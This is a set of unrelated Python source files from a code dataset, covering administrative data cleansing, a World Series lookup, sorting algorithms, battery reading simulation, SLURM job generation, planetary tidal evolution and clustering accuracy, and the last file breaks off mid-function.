'Joris', 'Winter', 'Claus', 'Thys', 'Massa', 'Roy']\n\n if ';' in full_name:\n split = remove_title(full_name).split(';')\n\n first = split[0]\n last = split[1]\n else:\n split = remove_title(full_name).split(' ')\n\n if len(split) == 1:\n comment.append('Cannot split name')\n\n potential_first_last = is_known_first_name(split[0], first_names)\n potential_last_first = is_known_first_name(split[-1], first_names)\n\n if potential_first_last and potential_last_first:\n if split[-1] in likely_last_names:\n first = split[0]\n last = ' '.join(split[1:])\n elif split[0] in likely_last_names:\n first = split[-1]\n last = ' '.join(split[0:-1])\n comment.append('Ambiguous: two possible first names - {}'.format(full_name))\n first = full_name\n elif potential_first_last:\n first = split[0]\n last = ' '.join(split[1:])\n elif potential_last_first:\n first = split[-1]\n last = ' '.join(split[0:-1])\n else:\n comment.append('No potential first name found - {}'.format(full_name))\n first = full_name\n # print([full_name])\n return [str(first).strip(), str(last).strip(), ' - '.join(comment)]\n\ndef decretale_functie_cleasing(decretale):\n decretale_functie = functionaris_status = np.nan\n\n if 'Waarnemend' in decretale:\n status = decretale[decretale.find(\"(\"):decretale.find(\")\")+1]\n decretale_functie = decretale.replace(status, '').strip()\n functionaris_status = 'Waarnemend'\n elif 'GEEN of ONBEKEND' in decretale:\n decretale_functie = np.nan\n else:\n decretale_functie = decretale.strip()\n functionaris_status = 'Effectief'\n\n return [decretale_functie, functionaris_status]\n\ndef find_resulting_org(orgs, name, type_entiteit):\n if name == 'Puurs Sint-Amands':\n return orgs[(orgs['Unieke Naam'].str.contains('PUURS_SINT_AMANDS', flags=re.IGNORECASE, regex=True, na=False)) & (orgs['Organisatiestatus'] == 'Actief') & (orgs['Type Entiteit'] == type_entiteit)]\n elif type_entiteit == 'Gemeente':\n return orgs[(orgs['Unieke Naam'].str.contains('G_' + name, flags=re.IGNORECASE, regex=True, na=False)) & (orgs['Organisatiestatus'] == 'Actief')]\n else:\n return orgs[(orgs['Unieke Naam'].str.contains('O_' + name, flags=re.IGNORECASE, regex=True, na=False)) & (orgs['Organisatiestatus'] == 'Actief')]\n\ndef org_status_cleansing(orgs):\n orgs['Resulting organisation'] = None\n\n for index, row in orgs[orgs['Organisatiestatus'] == 'gefusioneerd'].iterrows():\n if str(row['Opmerkingen ivm Organisatie']).startswith('Fusie'):\n resulting_city = row['Opmerkingen ivm Organisatie'].split('tot')[-1].strip()\n obj_resulting_org = find_resulting_org(orgs, resulting_city, row['Type Entiteit'])\n orgs.at[index, 'Resulting organisation'] = str(obj_resulting_org.iloc[0]['KBOnr_cleansed'])\n\n return orgs\n\ndef date_cleansing(date):\n dates_parsed = []\n\n if date != str(np.nan): \n match = re.findall(r'\\d{1,2}.\\d{1,2}.\\d{2,4}', date)\n if match:\n for m in match:\n date_parsed_match = dateparser.parse(m, settings={'DATE_ORDER': 'DMY'})\n if date_parsed_match != None:\n dates_parsed.append(date_parsed_match.isoformat())\n\n match = re.findall(r'\\d{1,2} \\w* \\d{2,4}', date)\n if match:\n for m in match:\n date_parsed_match = dateparser.parse(m, settings={'DATE_ORDER': 'DMY'}, languages=['nl'])\n if date_parsed_match != None:\n dates_parsed.append(date_parsed_match.isoformat())\n\n return dates_parsed\n\ndef voting_cleansing(date):\n date_cleansed = comment = np.nan\n\n if date != str(np.nan):\n dates_parsed = date_cleansing(date)\n\n if dates_parsed:\n date_cleansed = dates_parsed[0]\n if len(dates_parsed) > 1:\n comment = ' - '.join([str(date) for date in dates_parsed[1:]])\n else:\n comment = 'Wrong date format. Check it.'\n\n return [date_cleansed, comment]\n\n# final data will be [municipality_name:number]\ndef extract_area_percentage(data):\n m_p = []\n m_p.append(re.search(r'[a-zA-Z]+(\\-[a-zA-Z]+)*', data).group())\n\n if re.search(r'\\d+(\\,?\\d+)?', data):\n m_p.append(float(re.search(r'\\d+(\\,?\\.?\\d+)?', data).group().replace(',', '.')))\n else:\n m_p.append(0)\n \n return m_p\n\ndef is_municipality(municipality):\n res = find_city_province(municipality)\n\n if len(res) > 0:\n return True\n else:\n return False\n\ndef local_engagement_cleansing(row):\n division = {'Province': {}, 'Municipality': {}, 'Cross-Border': []}\n sl = None\n info = row['Opmerkingen_EB']\n cross_border = row['Grensoverschrijdend']\n province = row['Provincie Cleansed']\n municipality = row['Gemeente Cleansed']\n type_eredienst = row['Type_eredienst Cleansed']\n\n #{'Province': {'sds': 12, 'ss': 12}, 'Municipality': {'zze': 12}, 'Cross-Border': []} \n\n if type_eredienst == \"Islamitisch\" or type_eredienst == \"Orthodox\":\n if not cross_border and province != 'nan':\n division['Province'][province] = 100\n division['Cross-Border'].append(province)\n elif cross_border and info != 'nan':\n match = re.sub(r'\\ben\\b', ';', info)\n match = re.sub(r'Gebiedsomschrijving: ', '', match)\n sl = match.split(';')\n\n if len(sl) == 2:\n for data in sl:\n mp = extract_area_percentage(data)\n\n division['Province'][mp[0]] = mp[1]\n division['Cross-Border'].append(mp[0])\n else:\n division['Province'][province] = 0\n division['Cross-Border'].append(province)\n \n for data in sl:\n mp = extract_area_percentage(data)\n \n if is_municipality(mp[0]):\n division['Cross-Border'].append(mp[0])\n division['Municipality'][mp[0]] = mp[1]\n else:\n if not cross_border and municipality != 'nan':\n division['Municipality'][municipality] = 100\n division['Cross-Border'].append(municipality)\n elif cross_border and info != 'nan':\n match = re.sub(r'\\ben\\b', ';', info)\n\n # gebiedsomschrijving or Gebiedsomschrijving or gebiedsopmschrijving\n if 'mschrijving' in match:\n match = re.sub(r'(Zelfbedruipend - )?([gG]ebiedso[p]?mschrijving)', '', match)\n \n if ';' in match:\n sl = match.split(';')\n elif ', ' in info:\n sl = match.split(', ')\n elif ' - ' in info:\n sl = match.split(' - ')\n else:\n sl = match\n elif 'Gebiedsverdeling' in match:\n match = re.sub(r'(Vroeger:)?(Gebiedsverdeling:)', '', match)\n sl = match.split(';')\n elif 'Verdeelsleutel' in match:\n match = re.sub(r'(Verdeelsleutel:)', '', match)\n sl = match.split(', ')\n else:\n if ' - ' in match:\n sl = match.split(' - ')\n elif ', ' in match:\n sl = match.split(', ')\n elif ';' in match:\n sl = match.split(';')\n elif re.search(r'\\d+(\\,?\\d+)?', match):\n sl = match\n else:\n sl = None\n \n if sl != None:\n if isinstance(sl, list):\n for data in sl:\n mp = extract_area_percentage(data)\n \n if is_municipality(mp[0]):\n division['Municipality'][mp[0]] = mp[1]\n division['Cross-Border'].append(mp[0])\n else:\n mp = extract_area_percentage(sl)\n if is_municipality(mp[0]):\n division['Municipality'][mp[0]] = mp[1]\n division['Cross-Border'].append(mp[0])\n \n \n return str(division)\n\ndef mapping_change_event_type_worship(status):\n change_event_dict = {'Erkenningsaanvraag in behandeling': 'Erkenning aangevraagd', 'Niet actief - Samengevoegd (overgenomen)': 'Samenvoeging',\n 'Operationeel - Samengevoegd (met behoud van naam)': 'Samenvoeging', 'Niet actief - Samengevoegd (nieuwe entiteit)': 'Samenvoeging',\n 'Operationeel - Samengevoegd (met nieuwe naam)': 'Samenvoeging', 'Niet actief - Erkenning niet toegestaan': 'Erkenning niet toegekend',\n 'Niet actief - Ingetrokken': 'Erkenning opgeheven'}\n \n return [change_event_dict[status]]\n\ndef extract_change_event(status_info):\n result_changes = []\n matchs = {'Erkend door ': 'Erkenning toegekend', 'Koninklijke erkenning': 'Erkenning toegekend', 'naamswijziging': 'Naamswijziging', \n 'fusie': 'Samenvoeging', 'ebiedsomschrijving': 'Wijziging Gebiedsomschrijving', 'gebiedsuitbreiding': 'Wijziging Gebiedsomschrijving'\n }\n matchs.setdefault('missing_key', '')\n\n for key, value in matchs.items():\n if key in status_info:\n result_changes.append(value)\n \n return result_changes\n\ndef change_event_cleansing(row):\n status = row['Status_EB']\n status_info = row['Statusinfo']\n change_events = dates = np.nan\n\n if status == 'Operationeel' or status == 'Operationeel - Intrekkingsaanvraag lopende' or status == 'Operationeel - Samenvoeging lopende':\n change_events = extract_change_event(status_info)\n dates = date_cleansing(status_info)\n else:\n change_events = mapping_change_event_type_worship(status)\n dates = date_cleansing(status_info)\n\n return str(dict(zip(change_events, dates)))\n\ndef get_full_address(straat, huisnr, busnr, postcode, gemeente):\n full_address = ''\n if straat != str(np.nan):\n full_address += straat + ' '\n if huisnr != str(np.nan):\n full_address += huisnr\n if busnr != str(np.nan):\n full_address += ' '\n else:\n full_address += ', '\n if busnr != str(np.nan):\n full_address += busnr + ', '\n if postcode != str(np.nan):\n full_address += postcode + ' '\n if gemeente != str(np.nan):\n full_address += gemeente\n\n return full_address\n\ndef get_adm_unit_concept(adm_label, classification):\n adm_concept = None\n\n query = \"\"\"\n PREFIX xsd: \n PREFIX besluit: \n PREFIX skos: \n PREFIX mu: \n SELECT ?s ?uuid ?classificatie WHERE {{\n ?s a besluit:Bestuurseenheid; skos:prefLabel \"{adm_label}\"; mu:uuid ?uuid; besluit:classificatie ?classificatie .\n ?classificatie skos:prefLabel \"{classification}\" .\n }}\n \"\"\".format(adm_label = adm_label, classification = classification)\n \n SPARQL.setQuery(query)\n SPARQL.setReturnFormat(JSON)\n\n results = SPARQL.query().convert()\n \n if len(results['results']['bindings']) > 0:\n adm_concept = results['results']['bindings'][0] \n \n return adm_concept\n\ndef get_all_locations():\n query = \"\"\"\n PREFIX rdfs: \n PREFIX mu: \n PREFIX ext: \n PREFIX prov: \n\n SELECT * { \n ?loc a prov:Location; ?level; mu:uuid ?uuid; rdfs:label ?label\n FILTER (?level in (\"Gemeente\", \"Provincie\"))\n }\n \"\"\"\n\n SPARQL.setQuery(query)\n SPARQL.setReturnFormat(JSON)\n\n results = SPARQL.query().convert()\n\n return results['results']['bindings']\n\n\n# def get_werkingsgebied_concept(label, level):\n# location_concept = None\n\n# query = \"\"\"\n# PREFIX rdfs: \n# PREFIX mu: \n# PREFIX ext: \n# PREFIX prov: \n\n# SELECT * WHERE {{\n# ?s a prov:Location; ext:werkingsgebiedNiveau \"{level}\"; rdfs:label \"{label}\"; mu:uuid ?uuid.\n# }}\n# \"\"\".format(label = label, level = level)\n\n# SPARQL.setQuery(query)\n# SPARQL.setReturnFormat(JSON)\n\n# results = SPARQL.query().convert()\n\n# if len(results['results']['bindings']) > 0:\n# location_concept = results['results']['bindings'][0]\n\n# return location_concept\n\ndef get_all_admin_units():\n query = \"\"\"\n PREFIX xsd: \n PREFIX besluit: \n PREFIX skos: \n PREFIX mu: \n SELECT ?admin_unit ?admin_unit_label ?uuid ?classificatie WHERE {\n ?admin_unit a besluit:Bestuurseenheid; skos:prefLabel ?admin_unit_label; mu:uuid ?uuid; besluit:classificatie ?classificatie .\n ?classificatie skos:prefLabel ?classification_label .\n FILTER (?classification_label in (\"Gemeente\", \"Provincie\"))\n }\n \n \"\"\"\n\n SPARQL.setQuery(query)\n SPARQL.setReturnFormat(JSON)\n\n results = SPARQL.query().convert()\n\n return results['results']['bindings']\n\n\ndef worship_link_ro(row):\n \n type_eredienst = row[row.index[0]]\n province = row[row.index[1]]\n municipality = row[row.index[2]]\n ro_name = np.nan\n\n ro_dict = {'Rooms-Katholiek': [{'name': 'Bisdom Antwerpen', 'province': 'Antwerpen'}, {'name': 'Bisdom Brugge', 'province': 'West-Vlaanderen'},\n {'name': 'Bisdom Gent', 'province': 'Oost-Vlaanderen'}, {'name': 'Bisdom Hasselt', 'province': 'Limburg'},\n {'name': 'Aartsbisdom Mechelen-Brussel', 'province': 'Vlaams-Brabant'}],\n 'Israëlitisch': {'name': 'Centraal Israëlitische Consistorie van België'}, 'Anglicaans': {'name': 'Centraal Comité van de Anglicaanse Eredienst in België'},\n 'Protestants': {'name': 'Administratieve Raad van de Protestants-Evangelische Eredienst (ARPEE)'}, 'Orthodox': {'name':'Oecumenisch Patriarchaat van Konstantinopel'},\n 'Islamitisch': {'name': 'Executief van de Moslims van België'}}\n \n if type_eredienst == 'Rooms-Katholiek':\n if municipality in ['Bonheiden', 'Bornem', 'Duffel', 'Mechelen', 'Puurs-Sint-Amands', 'Sint-Katelijne-Waver', 'Willebroek']:\n ro_name = 'Aartsbisdom Mechelen-Brussel'\n else:\n rks = ro_dict['Rooms-Katholiek']\n for rk in rks: \n if rk['province'] == province:\n ro_name = rk['name']\n elif type_eredienst in ['Israëlitisch', 'Protestants', 'Islamitisch', 'Anglicaans', 'Orthodox']:\n ro_name = ro_dict[type_eredienst]['name']\n\n return ro_name\n\ndef exists_contact_org(row):\n return ((str(row['Website Cleansed']) != str(np.nan)) or (str(row['Algemeen telefoonnr']) != str(np.nan)) or (str(row['Algemeen mailadres']) != str(np.nan)))\n \ndef exists_site_org(row):\n return (exists_address(row) or exists_contact_org(row))\n\ndef exists_contact_cont(row):\n return ((str(row['Titel Cleansed']) != str(np.nan)) or (str(row['Mail nr2 Cleansed']) != str(np.nan)) or (str(row['Telefoonnr Contact 1']) != str(np.nan)))\n\ndef exists_role_worship(row, role):\n return (str(row[f'Datum verkiezing {role}']) != str(np.nan) and str(row[f'Naam_{role} Cleansed']) != str(np.nan))\n\ndef exists_mandate_central(row):\n return (str(row['Verkiezingen17_Opmerkingen Cleansed']) != str(np.nan) or str(row['Verkiezingen2020_Opmerkingen Cleansed']) != str(np.nan))\n\ndef exists_given_and_family_name(row, role):\n return (str(row[f'Naam_{role} First']) != str(np.nan)) or (str(row[f'Naam_{role} Last']) != str(np.nan))\n\ndef exists_address(row):\n return ((str(row['Straat']) != str(np.nan)) or (str(row['Huisnr Cleansed']) != str(np.nan)) or (str(row['Busnummer Cleansed']) != str(np.nan)) or\n (str(row['Postcode Cleansed']) != str(np.nan)) or (str(row['Gemeente Cleansed']) != str(np.nan)) or (str(row['Provincie Cleansed']) != str(np.nan)))\n\ndef exists_site_role(row, role):\n return exists_address_role(row, role) or exists_contact_role(row, role)\n\ndef exists_address_role(row, role):\n return (str(row[f'Adres_{role} Cleansed']) != str(np.nan))\n\ndef exists_contact_role(row, role):\n if not 'Lid' in role:\n return ((str(row[f'Tel_{role} 1']) != str(np.nan)) or (str(row[f'Mail_{role} Cleansed']) != str(np.nan)))\n else:\n return False\n\ndef exists_bestuursperiode_central(row):\n #return (str(row[f'Verkiezingen17_Opmerkingen Cleansed']) != str(np.nan) or str(row['Verkiezingen2020_Opmerkingen Cleansed']) != str(np.nan))\n return (str(row[f'Verkiezingen17']) != str(np.nan) or str(row['Verkiezingen2020']) != str(np.nan))\n\ndef exists_bestuursperiode_worship(row, roles):\n for role in roles:\n if exists_role_worship(row, role):\n return True\n \n return False\n\ndef get_cleansed_data(file, type):\n try:\n data_cleansed = pd.read_excel(f'output/{type}_cleansed.xlsx', dtype=str)\n except FileNotFoundError:\n data_raw = pd.read_excel(file, dtype=str)\n \n print(\"########### Cleansing started #############\")\n\n if type == 'worship': \n data_cleansed = worship.main(data_raw)\n elif type == 'central':\n data_cleansed = central.main(data_raw)\n elif type == 'org':\n data_cleansed = organization.main(data_raw)\n else:\n data_cleansed = contact.main(data_raw)\n\n print(\"########### Cleansing finished #############\")\n\n export_df(data_cleansed, type) \n\n return data_cleansed\n\ndef export_data(g, type):\n now = datetime.now().strftime('%Y%m%d%H%M%S')\n g.serialize(f'output/{now}-{type}.ttl',format='turtle')\n\ndef export_df(data, type):\n data.to_excel(f'output/{type}_cleansed.xlsx', index=False)","sub_path":"helper/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":31939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"396735354","text":"# proj5_william_verthein.py\n#\n# This program takes a test file of World Series winners. User enters a year\n# to see which team won that year, and says how many times the team has won.\n#\n# Constant created in case you want to update winners in recent years.\nYEAR_MOST_RECENT = 2009\n\ndef main():\n '''Program creates a dict of years, with corresponding team that won as the value for that year. Takes input of a year, returns winning team, and loops through dictionary to get total wins by that team.'''\n\n print('This program will tell you who won the World Series any year you choose.')\n print()\n teams = create_dict()\n entry = get_input()\n win_team, count = winner_eval(entry, teams)\n display_result(win_team, count, entry)\n\n# Create the dictionary of the\ndef create_dict():\n wld_ser_teams = open('WorldSeries.txt', 'r')\n f = wld_ser_teams.read().split('\\n')\n teams = {}\n key = 1903\n val = 0\n while key <= YEAR_MOST_RECENT:\n teams[key] = f[val]\n key += 1\n val += 1\n wld_ser_teams.close()\n return teams\n\n# Create the dict of years and team who won\ndef get_input():\n bad_data = True\n while bad_data == True:\n yr_inpt = input('Enter a year between 1903 and 2009 to see which team won the World Series that year: ')\n try:\n year = int(yr_inpt)\n except:\n print('That is not a valid input. Please enter a numerical year.')\n else:\n if year >= 1903 and year <= YEAR_MOST_RECENT:\n bad_data = False\n return year\n else:\n print('That year is out of range. Be sure to enter a year between 1903 and 2009.')\n\n# Evaluate input to get winning team and how many times they have won.\ndef winner_eval(year, teams):\n winning_team = teams.get(year)\n count = 0\n for team in teams.values():\n if team == winning_team:\n count += 1\n return winning_team, count\n\ndef display_result(winning_team, count, year):\n if year == 1904 or year == 1994:\n print(winning_team, '. There was no winning team.', sep = '')\n elif count == 1:\n print(winning_team, 'won during this year. They had won once over the years.')\n else:\n print(winning_team, 'won during this year. They have won', count, 'times over the years.')\n\nif __name__ == '__main__':\n main()\n","sub_path":"proj5_william_verthein.py","file_name":"proj5_william_verthein.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185524539","text":"#http://interactivepython.org/runestone/static/pythonds/SortSearch/TheSelectionSort.html \ndef selectionSort(alist):\n for fillslot in range(len(alist)-1,0,-1):\n positionOfMax=0\n for location in range(1,fillslot+1):\n if alist[location]>alist[positionOfMax]:\n positionOfMax = location\n\n temp = alist[fillslot]\n alist[fillslot] = alist[positionOfMax]\n alist[positionOfMax] = temp\n\ndef insertionSort(alist):\n for index in range(1,len(alist)):\n\n currentvalue = alist[index]\n position = index\n\n while position>0 and alist[position-1]>currentvalue:\n alist[position]=alist[position-1]\n position = position-1\n\n alist[position]=currentvalue\n\n\ndef mergeSort(alist):\n print(\"Splitting \",alist)\n if len(alist)>1:\n mid = len(alist)//2\n lefthalf = alist[:mid]\n righthalf = alist[mid:]\n\n mergeSort(lefthalf)\n mergeSort(righthalf)\n\n i=0\n j=0\n k=0\n while i= pivotvalue and \\\n rightmark >= leftmark:\n rightmark = rightmark -1\n\n if rightmark < leftmark:\n done = True\n else:\n temp = alist[leftmark]\n alist[leftmark] = alist[rightmark]\n alist[rightmark] = temp\n\n temp = alist[first]\n alist[first] = alist[rightmark]\n alist[rightmark] = temp\n\n return rightmark\n\nalist = [54,26,93,17,77,31,44,55,20]\nquickSort(alist)\nprint(alist)\n\nalist = [54,26,93,17,77,31,44,55,20]\nmergeSort(alist)\nprint(alist)\n\nalist = [54,26,93,17,77,31,44,55,20]\ninsertionSort(alist)\nprint(alist)\n\nalist = [54,26,93,17,77,31,44,55,20]\nselectionSort(alist)\nprint(alist)\n\n","sub_path":"python/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"440524519","text":"import numpy as np\n\nclass LinearController:\n \"\"\"A linear controller u = A x + b (b is optional)\"\"\"\n def __init__(self,A,b=None):\n self.A = A\n self.b = b\n\n def __eval__(self,x):\n res = np.dot(self.A,x)\n if self.b:\n res += self.b\n return res\n \n","sub_path":"Archived/Research/MotionPrimitives/Generation/optimization/control/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"380474382","text":"import random\nimport time\n\n#number of readings in stream to be sent to console \nno_of_readings_in_stream = 10\n\n#BatteryParameterRange = parameter_name : [lowerLimit,upperLimit]\nBattery_parameters_range= {'temperature':[0,45], 'soc':[20,80]}\n\n#geneerate single random reading between limits\ndef generate_param_reading(param):\n param_range= Battery_parameters_range[param]\n return (round(random.uniform(param_range[0], param_range[1]),2))\n\n#generate stream of readings between limits\ndef generate_param_stream(reading_count):\n [temp_stream,soc_stream]=[[],[]]\n for i in range(0,reading_count):\n temp_stream.append(generate_param_reading('temperature'))\n soc_stream.append(generate_param_reading('soc'))\n return ([temp_stream,soc_stream])\n\n#output to console the stream of readings\ndef stream_output(reading_count):\n #to test no. of readings\n count_readings=0\n end_of_stream=False\n [temp_stream,soc_stream]=generate_param_stream(reading_count)\n for i in range(0,reading_count):\n print(temp_stream[i],',',soc_stream[i])\n time.sleep(1)\n count_readings=count_readings+1\n \n #to test end of display\n if i==reading_count-1:\n end_of_stream=True\n return([end_of_stream,count_readings])\n\nstream_output(no_of_readings_in_stream)\n","sub_path":"generate_stream.py","file_name":"generate_stream.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"121754500","text":"\"\"\"\n script for making separate jobs and running on batch system.\n\n# job-i.sh contains executable commands; pre-job-i.sh moves to the job-i folder and copies files if necessary!\n\n\"\"\"\n\nfrom sys import argv, exit\nfrom os import makedirs, path, unlink\nfrom shutil import copytree, copy, rmtree\nimport subprocess\nimport os\nimport json\n\ndef split(a, n):\n k, m = divmod(len(a), n)\n return (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in xrange(n))\n\n\n####################################\n\ntry:\n # set parameters\n numberOfFiles = int(argv[1])\n numberOfJobs = int(argv[2])\n\nexcept:\n print('Didnt set number of files or jobs!')\n exit()\n\n\n#####################################\n\nCONF = json.load(open(\"Configure.json\", \"r\"))\nWORKING_FOLDER = CONF[\"workingFolder\"]\nSOURCE_ROOT = CONF[\"sourceRoot\"]\nJobsFolder = \"JOBS\"\n\n\nif not os.path.exists(JobsFolder):\n os.makedirs(JobsFolder)\n \n\nIntervals = list(split( range(1, numberOfFiles+1), numberOfJobs))\nCorrectedNumberOfJobs = len(Intervals)\n\nmin_index, max_index = '', ''\n\nfor i in range(1, CorrectedNumberOfJobs+1):\n\n #arguments = {'wf': WORKING_FOLDER, 'jb': JobsFolder, 'minI': min_index, 'maxI': max_index, 'sr': SOURCE_ROOT}\n job_folder='job'+'-'+str(i) \n j = '%j'\n N = '%N'\n min_index = Intervals[i-1][0] \n max_index = Intervals[i-1][-1] \n #print min_index, max_index\n\n open(path.join(JobsFolder, \"job-%d.sh\" % i), \"w\").write(\n\"\"\"#!/bin/bash\n\n# Task name\n#SBATCH -J doMacros\n\n# Run time limit\n#SBATCH --time=0-1:60:00\n\n# Working directory on shared storage\n#SBATCH -D %(wf)s/interpolation/JOBS/%(jb)s\n\n# Standard and error output in different files\n#SBATCH -o %(j)s_%(N)s.out.log\n#SBATCH -e %(j)s_%(N)s.err.log\n\n%(sr)s\nmodule use /cvmfs/it.gsi.de/modulefiles/\nmodule load /cvmfs/it.gsi.de/modulefiles/compiler/gcc/6.3.0\ntime python do_macros_2030.py %(minI)s %(maxI)s '%(jb)s' \n\nrm %(wf)s/interpolation/JOBS/%(jb)s/*/{eval_fit_graph_spectra_*,fit_graph_spectra_*,graph_spectra_*,chi_*}\n\n\n\"\"\" % {'wf': WORKING_FOLDER, 'jb': job_folder , 'minI': min_index, 'maxI': max_index, 'sr': SOURCE_ROOT, 'j': j, 'N': N} \n\n\n )\n\nfor i in range(1, CorrectedNumberOfJobs+1):\n\n job_folder='job'+'-'+str(i)\n\n open(path.join(JobsFolder, \"pre-job-%d.sh\" % i), \"w\").write(\n\n\"\"\"#!/bin/bash\nmkdir %s\ncd %s\nmkdir -p pion\nmkdir -p kaon\nmkdir -p proton\nscp ../../do_macros_2030.py ./\nscp ../../Configure.json ./\ncd ..\n\n\"\"\" % (job_folder, job_folder)\n\n )\n\n\nopen(path.join(JobsFolder, \"merge_root_files.sh\"), \"w\").write(\n\n\"\"\"#!/bin/bash\n\nls -1v %(wf)s/interpolation/JOBS/job-*/pion/tree* > listPion.txt\nls -1v %(wf)s/interpolation/JOBS/job-*/kaon/tree* > listKaon.txt\nls -1v %(wf)s/interpolation/JOBS/job-*/proton/tree* > listProton.txt\n\nhadd PionFull.root @listPion.txt\nhadd KaonFull.root @listKaon.txt\nhadd ProtonFull.root @listProton.txt\n\n\n\"\"\" % {'wf': WORKING_FOLDER}\n\n)\n","sub_path":"RunGrid-Cent2030/interpolation/makeJobs_2030.py","file_name":"makeJobs_2030.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"135933487","text":"from astropy.io import fits\nimport pandas as pd\nimport glob\nimport os\nimport numpy as np\n\ndef flux_to_lum(flux, distance):\n \"\"\"Distance should be in parsecs, flux in erg cm^-2 sec^-1\"\"\"\n dist_in_cm = 3.086*10**18.0 * distance # cm\n lum = np.multiply(flux, 4 * np.pi * np.power(dist_in_cm, 2.0))\n return lum\n\ndef planet_flux(luminosity, distance):\n \"\"\"Distance should be in AU, luminosity in erg sec^-1\"\"\"\n dist_in_cm = (6.685*10**(-14.))**-1.0 * distance # cm /au * cm3.086*10**18.0 * distance # cm\n flux_on_planet = np.true_divide(luminosity, np.multiply(4 * np.pi, np.power(dist_in_cm, 2.0)))\n return flux_on_planet\n\n\ndef tidal_evo(y, t, Q, r, per, dmdtval):\n \"\"\"Units: earth masses, years, AU\n \"\"\"\n k = 0.3 # some constant in tidal equations (love number) - doesn't matter if we plot everything in terms of Q' in the end\n G = 0.000118413597733711048158640226628895184135977337110481586 # (*AU^3/(earth mass*year^2),\n # which is G in these weird units*)\n\n mstar = 27000.0 # mass of trappist-1 star, in earth masses\n rstar = 5.627e-4 # radius of trappist-1 star, in AU\n # also all angles must be in radians\n a,e,m = y\n signval = np.sign(2 * (2*np.pi / 3.3) - 3*(2*np.pi / per))\n qprime_p = Q / ((2/3.) * k)\n qprime_s = 1e5 / ((2/3.) * k) # https://iopscience.iop.org/article/10.3847/1538-4357/aad40e/pdf\n\n dadt = (signval * 9./2. * np.sqrt(G/ mstar) * np.power(rstar, 5.) * m * np.power(qprime_s, -1.) - 63./2. * np.multiply(qprime_p, m)**-1*np.sqrt(G * mstar**3.0) *np.power(r,5.0) * np.power(e, 2.0)) * np.power(a, -11/2.) \n dedt = (signval * 171./16. * np.sqrt(G/ mstar) * np.power(rstar, 5.) * m * np.power(qprime_s, -1.) - 63./4. * np.multiply(qprime_p, m)**-1*np.sqrt((G * mstar**3.0)) *(r)**5.0) * np.power(a, -13/2.) * e\n #drdt = -1e-18 / (4.0 * np.pi * r**2.) # dm/dt / (4 pi r^2) = dr/dt\n dmdt = -1 * dmdtval\n dydt = np.asarray([dadt, dedt, dmdt])\n return dydt","sub_path":".ipynb_checkpoints/trappist_machine-checkpoint.py","file_name":"trappist_machine-checkpoint.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"547666780","text":"\nfrom __future__ import print_function\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\n\nimport argparse\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nimport numpy as np\nimport os\n\n\n#coherent_array must be 5*5\ndef cout_auc_5(coherent_array):\n \n Accuracy =[]\n Position=[]\n\n for i in range(0,5):\n for j in range(0,5):\n for m in range(0,5):\n lis=[0,1,2,3,4]\n if i!=j and i!=m and m!=j:\n lis.remove(i)\n lis.remove(j)\n lis.remove(m)\n a=lis[0]\n b=lis[1]\n accuracy = float(coherent_array[0][i]+coherent_array[1][j]+coherent_array[2][m]+coherent_array[3][a]+coherent_array[3][b])/coherent_array.sum()\n position = [i,j,m,a,b]\n Accuracy.append(accuracy)\n Position.append(position)\n for i in range(0,5):\n for j in range(0,5):\n for m in range(0,5):\n lis=[0,1,2,3,4]\n if i!=j and i!=m and m!=j:\n lis.remove(i)\n lis.remove(j)\n lis.remove(m)\n a=lis[0]\n b=lis[1]\n accuracy = float(coherent_array[0][i]+coherent_array[1][j]+coherent_array[3][m]+coherent_array[2][a]+coherent_array[2][b])/coherent_array.sum()\n position = [i,j,m,a,b]\n Accuracy.append(accuracy)\n Position.append(position)\n for i in range(0,5):\n for j in range(0,5):\n for m in range(0,5):\n lis=[0,1,2,3,4]\n if i!=j and i!=m and m!=j:\n lis.remove(i)\n lis.remove(j)\n lis.remove(m)\n a=lis[0]\n b=lis[1]\n accuracy = float(coherent_array[0][i]+coherent_array[3][j]+coherent_array[2][m]+coherent_array[1][a]+coherent_array[1][b])/coherent_array.sum()\n position = [i,j,m,a,b]\n Accuracy.append(accuracy)\n Position.append(position)\n for i in range(0,5):\n for j in range(0,5):\n for m in range(0,5):\n lis=[0,1,2,3,4]\n if i!=j and i!=m and m!=j:\n lis.remove(i)\n lis.remove(j)\n lis.remove(m)\n a=lis[0]\n b=lis[1]\n accuracy = float(coherent_array[0][i]+coherent_array[3][j]+coherent_array[2][m]+coherent_array[0][a]+coherent_array[0][b])/coherent_array.sum()\n position = [i,j,m,a,b]\n Accuracy.append(accuracy)\n Position.append(position)\n auc = max(Accuracy)\n p=Accuracy.index(auc)\n pos = Position[p]\n print(auc)\n \n \ndef clustering5(paramsG,paramsD,paramsDD,paramsDQ):\n root_dir = '/disk1/labeled/'\n npyList = os.listdir(root_dir)\n npyList = [root_dir+n for n in npyList]\n result = []\n label = []\n for n,array in enumerate(npyList):\n result.append(np.load(array))\n label.append([n]*result[n].shape[0])\n\n result = np.concatenate(result)\n label = np.concatenate(label)\n\n X = np.asarray([x.transpose((2,0,1)) for x in result])\n X = 